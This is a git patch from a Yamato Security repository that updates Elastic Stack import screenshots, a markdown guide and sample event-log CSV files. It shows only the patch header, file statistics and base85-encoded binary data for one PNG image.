From aa74af4177eb69f9243cf4d0ac17479e7509cd3f Mon Sep 17 00:00:00 2001
From: Tanaka Zakku <71482215+YamatoSecurity@users.noreply.github.com>
Date: Fri, 15 Apr 2022 11:14:42 +0900
Subject: [PATCH] update

---
 .../08-ImportDataSettings.png                 |   Bin 327169 -> 328554 bytes
 doc/ElasticStackImport/09-ImportFinish.png    |   Bin 247709 -> 180280 bytes
 doc/ElasticStackImport/12-AddingColumns.png   |   Bin 0 -> 125224 bytes
 .../13-RecommendedColumns.png                 |   Bin 0 -> 98959 bytes
 .../14-DicoverWithColumns.png                 |   Bin 0 -> 516484 bytes
 .../ElasticStackImport-English.md             |    51 +-
 rules                                         |     2 +-
 sample-evtx-default-rules.csv                 | 14662 ++++++++++++++
 sample-evtx.csv                               | 16623 ++++++++++++++++
 9 files changed, 31324 insertions(+), 14 deletions(-)
 create mode 100644 doc/ElasticStackImport/12-AddingColumns.png
 create mode 100644 doc/ElasticStackImport/13-RecommendedColumns.png
 create mode 100644 doc/ElasticStackImport/14-DicoverWithColumns.png
 create mode 100644 sample-evtx-default-rules.csv
 create mode 100644 sample-evtx.csv

diff --git a/doc/ElasticStackImport/08-ImportDataSettings.png b/doc/ElasticStackImport/08-ImportDataSettings.png
index 74f3ab2c3bf9c7e64676e4ae7e1aa4a35f15c103..05954d94ba9a0da3b0668390fe7ce3fcd912e32a 100644
GIT binary patch
literal 328554
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
